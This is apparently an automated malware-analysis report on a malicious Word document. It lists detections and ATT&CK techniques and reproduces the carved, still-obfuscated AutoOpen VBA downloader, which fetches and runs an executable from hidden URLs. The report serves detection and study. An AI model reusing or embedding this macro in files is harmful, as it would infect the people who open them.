Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen subroutine that calls the Shell() function. The argument to Shell() is assembled at runtime from several helper functions, and is most likely a command that downloads and runs a secondary payload. The assembled string begins with 'cmd /V:ON/C', which enables delayed environment-variable expansion and hands the rest of the string to the command interpreter. The string is built from short fragments joined with '+', with caret (^) escape characters that cmd.exe strips, and with individual characters produced by Chr() arithmetic (for example Chr(10 + 14 + 1 + 18 + 56) is Chr(99), the letter 'c'), so keywords such as 'cmd' and 'http' never appear contiguously in the macro source; this is why signature matching on the raw VBA text is unreliable here and the Shell() call plus the AutoOpen entry point are the more robust indicators.
Heuristics (6)

- ClamAV: Doc.Downloader.Pederr-6691327-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Pederr-6691327-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 0d1e901f8f0da5ab344392ce1886175704bfdfe7813e92098dd38a97d4a324b9) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4852 bytes |
Preview script: first 1,000 lines of the extracted script (the decoded VBA source is reproduced as carved, obfuscation intact):
Attribute VB_Name = "OZtosLnX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set sBdisU = joKqOi
Set IMOGk = kfIwWt
Set hqbUK = twcjD
Set swQUa = iFjMPu
Set DABpBi = puVnmp
Set LaiAkl = aSYTN
Set cPZwd = GnGDP
Set whzjC = KatsNT
Set SwGijd = vKvPSm
Shell YFZsHuzjH + miqlSuTLK + qmQTUIUSpjNi + DUkwjEQdoU, Format(0)
Set MKzbR = BPUJw
Set BtVlfQ = FDuiq
Set SBKZt = wUkklT
Set hPNwwi = vJSOPE
End Sub
Attribute VB_Name = "aNHwYTzHKBU"
Function YFZsHuzjH()
On _
Error _
Resume _
Next
Set joIwG = SizaTS
Set XtWRms = rzilu
Set HTbQn = iHAISk
Set oAiVa = LFDBjz
Set UvSJs = iKtAkq
jOtrSdZQrf = Format(Chr(10 + 14 + 1 + 18 + 56)) + "md /V^" + ":" + "^ON/" + Format(Chr(7 + 9 + 0 + 12 + 39)) + Format(Chr(3 + 4 + 0 + 5 + 22)) + "s^" + "e" + "^t Q" + "^j=" + " ^ ^ " + " " + " ^ ^ "
Set witMf = EpIrYE
Set rQcvw = owVqd
Set WhwIt = zAQTB
BZtsZvPD = "^ ^ " + "^ ^ ^ " + " }}^" + "{^h" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^t^a" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^" + "}^;ka^e" + "rb" + ";" + "^DvI" + "$"
Set KVdBaw = hTkoJ
Set DArTE = UnfmS
Set wOaLn = NYjwb
Set KJwsGn = QAHQS
ujQGs = "^ ^m" + "etI^-^e" + "^k^o" + "vn^I" + "^;)^" + "DvI^$ " + ",S" + "^U^m" + "^$(^e" + "^liFdao" + "^ln"
Set lpjZo = BhcQkB
Set RbIjuN = bnqof
RQMVq = "woD.m^K" + "d^" + "$^{yrt^" + "{)" + "^" + "GX"
Set aAnuwC = GsmSIb
Set WmPfij = iWASJ
zShaskjt = "v^$ " + "ni " + "^S^U" + "^m$(" + "h" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "a^er^" + "of^;'ex" + "e^.'^+" + "^t^Un$"
Set JUzpBQ = GtibUP
Set FbHLUC = bTMSS
MnmlwZ = "+^'" + "^\" + "'^" + "+" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "i^lb^" + "u^p^:" + "v" + "n^e^$" + "^" + "=^Dv^I$"
Set toQHdz = mSLZf
Set jzfNNp = EIUivo
Set HLskuv = BqVjts
Set uXkEdJ = OtSHHT
Set uWuiM = ahVwp
NSYlscpHp = "^;" + "'" + "676'^" + " " + "=^ tUn^" + "$^;" + ")'" + "^@'(^ti" + "^l^" + "p^" + "S.'" + "v^zq" + Format(Chr(10 + 14 + 1 + 18 + 56))
Set QzBLq = MwOScI
Set OYzpK = kZRiGl
mWPlCOJ = "^A^B^w" + "hq1/" + "mo" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.gni^" + "k^d^ia"
Set WsuqRF = ofHTLl
Set FEZHL = ahRwEP
Set hawjD = Jiwwjq
Set irZwj = zfnRA
jFrZRfiQ = "r//^:p" + "^tt^h^" + "@ziIDLs" + "^MX^" + "o6/^m" + "o" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.^de"
Set wskOR = aDtDZ
Set RHHIf = jZNpz
Set AJAioz = wFZiHa
EKhtwhPv = "ti^mi^" + "ls^ko" + "ob" + "^mur" + "t" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^eps" + "/" + "/^:p^tt" + "h^@A" + Format(Chr(7 + 9 + 0 + 12 + 39)) + "^" + "2fQu^x^" + "OP" + "^3/vvv" + "^"
Set zVYlVw = nmMDU
Set pqhBRH = JVEcC
Set SCHqsB = lwRSYQ
Set ZGTzj = AzVWTA
Set uELuq = LiGZp
jtaQWAtK = "w^w" + "/" + "ku.^" + "o" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^.b^e" + "^we" + "^ht4/" + "/^:^" + "pt^t^h" + "^@^"
YFZsHuzjH = jOtrSdZQrf + BZtsZvPD + ujQGs + RQMVq + zShaskjt + MnmlwZ + NSYlscpHp + mWPlCOJ + jFrZRfiQ + EKhtwhPv + jtaQWAtK
Set mlPwIQ = NHiZc
Set hrtEs = vUKqk
Set jHLYv = CBHvPd
Set pkiTjf = cfPkUj
Set tLSGK = qlPHb
End Function
Function miqlSuTLK()
On _
Error _
Resume _
Next
Set zVozG = qopFD
Set wilaS = WSmmqd
Set SkROId = qqHEC
Set piibMo = fSGbi
viMir = "xb" + "O^l^X" + "N^qX^" + "2^k/rf." + "t" + "pe" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "no" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "^" + "or" + "u^emo" + Format(Chr(10 + 14 + 1 + 18 + 56)) + "/"
Set NjzKu = GDilBR
OXTJVwzAIiW = "/:p^" + "tth^" + "@^" + "Hv^9xvu" + "^2y" + "jE/ri^"
Set YfwQAL = dpHCRP
Set XLhni = hkXvkG
Set niwKYC = SlAibz
VUvbCOEkzi = ".tn^ig" + "^a" + "^m" + "//:" + "pt^" + "th^'^" + "=G^Xv$" + "^;tn" + "^e^il" + Format(Chr(7 + 9 + 0 + 12 + 39)) + "^b" + "eW^"
Set crYizW = pZcfM
Set OowkOt = rCVsp
Set Skdmd = qkbwDG
rDoJmdo
... (truncated)